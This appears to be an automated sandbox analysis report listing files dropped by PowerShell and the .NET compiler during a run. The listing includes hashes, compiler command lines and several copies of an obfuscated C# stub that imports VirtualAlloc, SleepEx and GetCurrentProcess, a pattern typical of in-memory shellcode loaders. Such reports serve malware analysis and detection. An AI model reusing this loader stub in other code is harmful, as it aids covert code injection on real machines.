...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.o.n.0.v.o.s.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.
                            C:\Users\user\AppData\Local\Temp\RES5221.tmp
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                            Category:dropped
                            Size (bytes):1336
                            Entropy (8bit):3.9997994300245385
                            Encrypted:false
                            SSDEEP:24:HkFm9mayzVaHUMhKdNwI+ycuZhNcakSoPNnq9Sd:PyzI0eKdm1ulca3Qq9C
                            MD5:A7D19B016DD2E87C7F1705B8AF710E8E
                            SHA1:E7051DE14C9A314A4080D70224AD09816268BF02
                            SHA-256:016221C08CBD224990582FEE0A8BA0DCA0DF09DDF7FDA02F4599FFA82A2B3952
                            SHA-512:F5EE0E4E2556DC500CEA21597DC7E4C4E4C937543E019FB6F9BE31CC7DB6F6A8149C6C99C4F4C4930F045360D6C4AA185278F26B9EBD796B2F6E55A919F997FB
                            Malicious:false
                            Reputation:unknown
                            Preview: L.....a.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........W....c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP...................,py,.......X..........7.......C:\Users\user\AppData\Local\Temp\RES5221.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.u.p.b.k.l.0.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                            C:\Users\user\AppData\Local\Temp\RES5A7E.tmp
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                            Category:dropped
                            Size (bytes):1336
                            Entropy (8bit):3.979389767875343
                            Encrypted:false
                            SSDEEP:24:HfFm9na7QVQaHVuPYhKdNwI+ycuZhN05akSPOPNnq9Sd:P7QXFKdm1ulua3Kq9C
                            MD5:BBFDDF46C53F13E3CD50C7FB032A9C11
                            SHA1:7FD005ACB8E69898681243C45BAEE3E9B07E1A60
                            SHA-256:63ED0B7F7A4719A72DA2A424362DBCDDA27BB627AC844AFD13F71080AEE3AE31
                            SHA-512:8BFB18E6C91F2341877E8E28745730E4A191E8AFE83DA8ED175932AD2D92E11664E5F96727CEA54BC8AFAA3B36ED40CE338B2686C60C1FFA778CE804C4CD4964
                            Malicious:false
                            Reputation:unknown
                            Preview: L.....a.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........V....c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP...................Z.g9ZU.k}r=o.q..........7.......C:\Users\user\AppData\Local\Temp\RES5A7E.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...w.n.c.z.r.n.m.s...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2eefwtls.lhg.ps1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3qmymils.dhi.ps1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c23bcfov.aow.psm1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_culvhp2o.fyb.ps1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mf2uh0zs.y2u.psm1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pojno3ob.mpp.psm1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v0ypotfd.4rq.psm1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeezm4uy.clm.ps1
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:unknown
                            Preview: 1
                            C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):395
                            Entropy (8bit):5.011724479977666
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                            MD5:B1DA1EF961AA0CE50C236459261D955A
                            SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                            SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                            SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                            Malicious:false
                            Reputation:unknown
                            Preview:
                                using System;
                                using System.Runtime.InteropServices;

                                namespace W32
                                {
                                    public class ufc
                                    {
                                        [DllImport("kernel32")]
                                        public static extern IntPtr GetCurrentProcess();
                                        [DllImport("kernel32")]
                                        public static extern void SleepEx(uint ylpxxdj,uint gtjjej);
                                        [DllImport("kernel32")]
                                        public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);
                                    }
                                }
                            C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.216630389653668
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fMpo/l0zxs7+AEszIN723fMpo//n:p37Lvkmb6K2aWoCWZETaWoH
                            MD5:F2CAB91D6AE2F982B347805414E2DA2F
                            SHA1:9134FFA580A5782320E2BECD2E6D13CA5016FE4A
                            SHA-256:E7A0D624F6DA13B73E6397DAAF131CE3B8A843CBF47975D26A1C7C39B1A79DAA
                            SHA-512:B1A982AD547563FD21A51E442BC4CB6A0A5AF5E8F5EA47B23734BC9657366F5E57A198B7EFBA97AACB2F99A751931E1C5446748D178D8DB564F3AEB416ED51B0
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.0.cs"
                            C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):872
                            Entropy (8bit):5.3041980760639875
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2aWozETaWoOKaM5DqBVKVrdFAMBJTH:Akka6CfE+yKxDcVKdBJj
                            MD5:28601DA1A34FA522B7E501CAB2D52D0D
                            SHA1:CE63B8E4F3DACA2C049859BCCFEFE922312E953B
                            SHA-256:71785F6CACBEA8608EE82CBEF53670305A597D826F6AA6A2BACB13A722378992
                            SHA-512:605216610FF268226BED924AE1F648B5733C2D119757CF6FBEB9BD67371D98F5C19C5D34E3CA09E4B4781B97FBE7E6BADF56AB44601B7AC0BC1A472B50881A52
                            Malicious:false
                            Reputation:unknown
                            Preview:
                                C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\fvuaw4pr\fvuaw4pr.0.cs"

                                Microsoft (R) Visual C# Compiler version 4.7.3056.0
                                for C# 5
                                Copyright (C) Microsoft Corporation. All rights reserved.

                                This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240
                            C:\Users\user\AppData\Local\Temp\gmpgobli\CSCF109427183474975B6FB7C2A3C78B8D5.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.074713113011581
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryRrak7Ynqq4EPN5Dlq5J:+RI+ycuZhNvakSBPNnqX
                            MD5:DB7C686DED61FAF08452A0F834AFA8DA
                            SHA1:58D7DDDA0A4A2DA91E31C497B111902DAC894F1B
                            SHA-256:BEB640592987F9EABFCF681FBA55C2A2A39D87D033E90359DE62F37DEBED2A09
                            SHA-512:85B17CC2EB71A6DD7065610726B61666C2A5C075851DE4B39CF2DD85EBBBCE6266BC65452C02AE27FD48C6DAEE72C9F45AA09557EB8B98587E04A821DFD0CE8E
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...g.m.p.g.o.b.l.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...g.m.p.g.o.b.l.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):395
                            Entropy (8bit):5.011724479977666
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                            MD5:B1DA1EF961AA0CE50C236459261D955A
                            SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                            SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                            SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                            Malicious:false
                            Reputation:unknown
                            Preview:
                                using System;
                                using System.Runtime.InteropServices;

                                namespace W32
                                {
                                    public class ufc
                                    {
                                        [DllImport("kernel32")]
                                        public static extern IntPtr GetCurrentProcess();
                                        [DllImport("kernel32")]
                                        public static extern void SleepEx(uint ylpxxdj,uint gtjjej);
                                        [DllImport("kernel32")]
                                        public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);
                                    }
                                }
                            C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.158352377882466
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fMnzxs7+AEszIN723fM2GAn:p37Lvkmb6K2a0nWZETa02GAn
                            MD5:572BA0D098BD81AE02A0A8D1820CC54E
                            SHA1:8CD2D32442EE473F6ABFA6ED6879958BE9F0B644
                            SHA-256:F93B490D9A53DBF4B286DB3F90D7F1831712992DA4F55AB58A25100DFF70B2BA
                            SHA-512:2CAC5D0802040E9224834909AEDAF66ABA49A3A0BAF622775FE7478829D86D394724E69C8F529B4BBBD864DA85C3ABAD7424A2304149458487EBAF753BEDC23B
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.0.cs"
                            C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                            Category:dropped
                            Size (bytes):3584
                            Entropy (8bit):2.596786045578255
                            Encrypted:false
                            SSDEEP:24:etGSh/W2dg85xyFODuhxpdWXoWtkZf/KK1UKJ+WI+ycuZhNvakSBPNnq:6Mkb5xykIHWEJCMUKl1ulva3zq
                            MD5:741ADACFC6720E0AF6140AF8DCC349FC
                            SHA1:6EF662F94911E4B24D4B451C27B92536B8F70A95
                            SHA-256:6C26CE931BB1E5E14A72E8EEE8EF3C311B1E4591AB5431716B538AADE4DB8775
                            SHA-512:498BFAAF7842A7FD86C0C4B53F8EF17EBC3FDE3E2E5652958FFF540405145F2B29206A66422873D3F17528960F953D931366FBE3D63C7A5BEAA217298F0E6ABF
                            Malicious:false
                            Reputation:unknown
                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....a...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ..X.............................................................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ H............ P.....P ......].........c.....k.....r.....w...............]. ...]...!.].%...].......*.....3.......6.......H.......P...........
                            C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:modified
                            Size (bytes):872
                            Entropy (8bit):5.287567169766519
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2a/ETao1KaM5DqBVKVrdFAMBJTH:Akka6C/E+o1KxDcVKdBJj
                            MD5:8BCCA5B89F2FA310526D310DF8DBCC42
                            SHA1:FE8909B3FCC426455447E45861D10CC5D5B108FD
                            SHA-256:1FD4EB9B6D19F65B0ACAAF11A7D722C50CD3D12840694A0673FA3CEA0B03B32D
                            SHA-512:C4368FBF67BB826E5B0DC8C1E5E5AC4171157410A405DCB2C12A989F6DCC20084BB2F827EE9D64F92694A4C907F1A7E1F3EC4E40075883B2C6D00270BBB8CA89
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text
                            Category:dropped
                            Size (bytes):395
                            Entropy (8bit):5.011724479977666
                            Encrypted:false
                            SSDEEP:6:V/DsYLDS81zuJZFMRSRa+eNMjSSRrh+SRNdDQaAntHQy:V/DTLDfuHV9eg5rh14aAntwy
                            MD5:B1DA1EF961AA0CE50C236459261D955A
                            SHA1:99CF19F188248557193608FE42C1CB88FCF234E1
                            SHA-256:139659D9C1D794242DE8DEFB1E33C785B3B63A691230874656B2B1AFC9E0B26B
                            SHA-512:27C4E9D4D1926A87EB5A2CAFD768D80A9D566C5FE9C7EB17F87453698415B30E251816738388C3171519A74B20AB0919C47C04A1E6CF9E1D82547540DF5E1682
                            Malicious:false
                            Reputation:unknown
                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class ufc. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint ylpxxdj,uint gtjjej);.[DllImport("kernel32")].public static extern IntPtr VirtualAlloc(IntPtr mmpi,uint xkljddbswyg,uint jfalf,uint iqbvunafhnr);.. }..}.
                            C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.cmdline
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                            Category:dropped
                            Size (bytes):375
                            Entropy (8bit):5.266859690195427
                            Encrypted:false
                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2N723fVCTjC7JUzxs7+AEszIN723fVCTjC3:p37Lvkmb6K2aL+WZETan
                            MD5:4C7D143E2EC6E0CA2EE0893AF138CD54
                            SHA1:A68CAEF8C25979706DE7913E48AD6587288C035A
                            SHA-256:94B89A0A848DFF70B8DF7A7D095D81C2DFF9CF65E156246958F1124DB66A4353
                            SHA-512:1F303FE5AF50CD7ECBB9741F1FB8185F44DA0719CD6714BA0E8DDD429205128A69E1E72E8C2B5A6CE235B0C950222F7FA7B38855CC464DF887129AB633C94905
                            Malicious:false
                            Reputation:unknown
                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.0.cs"
                            C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.out
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF, CR line terminators
                            Category:dropped
                            Size (bytes):872
                            Entropy (8bit):5.326473552198273
                            Encrypted:false
                            SSDEEP:24:AId3ka6K2aL/ETauKaM5DqBVKVrdFAMBJTH:Akka6CL/E+uKxDcVKdBJj
                            MD5:F82E94D258F3D67B8A490649E0C3D4CD
                            SHA1:FC0ED64AA500019001A82BD2C49D2358386C03C4
                            SHA-256:5821291F4341F52EFDB9CFF95808C4651DB8B2B95F511402B7985667167FE7D2
                            SHA-512:2B0E9907EA5C1E380D337A14014F53AA49D2BDF6E35A7DA0943DAEDD6DC49FF24AF5618EA713524E55049F62BCA3E7EAE3026BED5AC27A1D9F5FF726C07D83D2
                            Malicious:false
                            Reputation:unknown
                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hr1cwmgj\hr1cwmgj.0.cs"......Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            File Type:MSVC .res
                            Category:dropped
                            Size (bytes):652
                            Entropy (8bit):3.0924949403415782
                            Encrypted:false
                            SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryGzak7YnqqLcPN5Dlq5J:+RI+ycuZhNcakSoPNnqX
                            MD5:C2FED3B62C70792CE5FBC51B8104FF58
                            SHA1:A697EC532E1C75AC63A2D688109BE3A08DEAF138
                            SHA-256:8796FC4DF02E92514DFFF15DF891E70F332C9CE5009E2F4F4D9E10CAEA43F321
                            SHA-512:7C5D29E3C402DBD40505CE8BD3EA833EF0E67FC029B524466198964097979AC52CC452790F1C503A8674BDE4968FC93A0A652B95A4574A0A0C72A3903262D77B
                            Malicious:false
                            Reputation:unknown
                            Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.u.p.b.k.l.0.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.u.p.b.k.l.0.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                            C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.0.cs
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
